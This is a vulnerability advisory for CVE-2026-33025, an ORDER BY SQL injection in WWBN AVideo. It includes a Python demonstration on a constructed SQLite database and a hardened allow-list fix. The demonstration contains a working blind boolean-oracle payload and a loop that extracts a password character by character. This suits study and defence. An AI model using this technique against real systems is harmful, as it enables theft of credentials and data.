SQL Injection Vulnerability in AVideo Platform by WWBN
CVE-2026-33025

8.6 HIGH

Key Information:

Vendor

Wwbn

CVE Published:
20 March 2026

What is CVE-2026-33025?

The AVideo video-sharing platform has a SQL injection vulnerability in the getSqlFromPost() method of Object.php, which builds the ORDER BY clause from the keys of the $_POST['sort'] array and inserts them directly into the query as SQL column identifiers. The code passes these keys through real_escape_string(), but that function only neutralises characters that are dangerous inside a quoted string literal (quotes, backslashes, NUL and a few control characters). An unquoted identifier sits outside any string context, so parentheses, commas, operators and subqueries survive the escaping untouched, and an attacker can inject arbitrary SQL into the ORDER BY clause. Users are encouraged to upgrade to version 8.0. Where an immediate upgrade is not possible, alternative measures include Web Application Firewall (WAF) rules that reject POST requests whose 'sort' keys contain non-alphanumeric characters, and access controls that restrict the affected endpoints to trusted IP ranges.
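The following is an added illustration, not code from AVideo or from the advisory. It reproduces the described pattern in Python against an in-memory SQLite database: the keys of a sort array are pushed through a string-context escaping function modelled on real_escape_string() and then used as unquoted ORDER BY identifiers. Because the attacker's sort key contains no quotes or backslashes, the escaping changes nothing, and the row order becomes a boolean oracle that leaks a secret one character at a time. The table layout, the secret value, and the allow-list used by the hardened variant are all constructed for the example.

```python
import sqlite3

# Constructed sample data for the demonstration (not AVideo's schema).
SECRET = "s3cr3t"
ALLOWED_SORT_COLUMNS = {"id", "title", "created"}


def escape_string_context(s: str) -> str:
    """Approximation of mysqli::real_escape_string(): it only neutralises
    characters that matter inside a quoted string literal."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in s)


def order_by_vulnerable(sort: dict) -> str:
    """Mirrors the described flaw: dict keys (the $_POST['sort'] keys) become
    unquoted ORDER BY identifiers after string-context escaping."""
    parts = []
    for column, direction in sort.items():
        d = "DESC" if str(direction).upper() == "DESC" else "ASC"
        parts.append(f"{escape_string_context(column)} {d}")
    return " ORDER BY " + ", ".join(parts) if parts else ""


def order_by_hardened(sort: dict) -> str:
    """Fix: identifiers are checked against an allow-list, then quoted."""
    parts = []
    for column, direction in sort.items():
        if column not in ALLOWED_SORT_COLUMNS:
            raise ValueError(f"invalid sort column: {column!r}")
        d = "DESC" if str(direction).upper() == "DESC" else "ASC"
        parts.append(f"`{column}` {d}")
    return " ORDER BY " + ", ".join(parts) if parts else ""


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with a public table and a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT, created INTEGER);
        INSERT INTO videos VALUES (1, 'first', 10), (2, 'second', 20), (3, 'third', 30);
        CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (1, ?)", (SECRET,))
    return conn


def list_video_ids(conn: sqlite3.Connection, order_by: str) -> list:
    return [row[0] for row in conn.execute("SELECT id FROM videos" + order_by)]


def oracle_key(position: int, code: int) -> str:
    """Attacker-controlled sort key. It contains no quotes or backslashes, so
    escape_string_context() passes it through unchanged; the resulting row
    order then reveals whether the guessed character code is correct."""
    return (f"(CASE WHEN (SELECT unicode(substr(password,{position},1)) "
            f"FROM users WHERE id=1)={code} THEN id ELSE -id END)")


def recover_secret(conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Blind extraction through the ORDER BY injection, one character at a time."""
    ascending = list_video_ids(conn, order_by_hardened({"id": "asc"}))
    recovered = ""
    for position in range(1, max_len + 1):
        for code in range(32, 127):
            sort = {oracle_key(position, code): "asc"}
            if list_video_ids(conn, order_by_vulnerable(sort)) == ascending:
                recovered += chr(code)
                break
        else:
            break  # no printable character matched: end of the secret
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", recover_secret(db))
    try:
        order_by_hardened({oracle_key(1, 115): "asc"})
    except ValueError as exc:
        print("hardened version rejected it:", exc)
```

The hardened variant makes the point that escaping is the wrong tool for identifiers: a column name has to be validated against a fixed allow-list (or mapped from a client-side token to a server-side column), and only then quoted. The same allow-list check is what a WAF rule that rejects non-alphanumeric 'sort' keys approximates from the outside.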

Affected Version(s)

AVideo-Encoder < 8.0

CVSS V4

Score: 8.6
Severity: HIGH
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: None
Confidentiality: High
Integrity: High
Availability: None

Timeline

  • Vulnerability published: 20 March 2026

  • Vulnerability reserved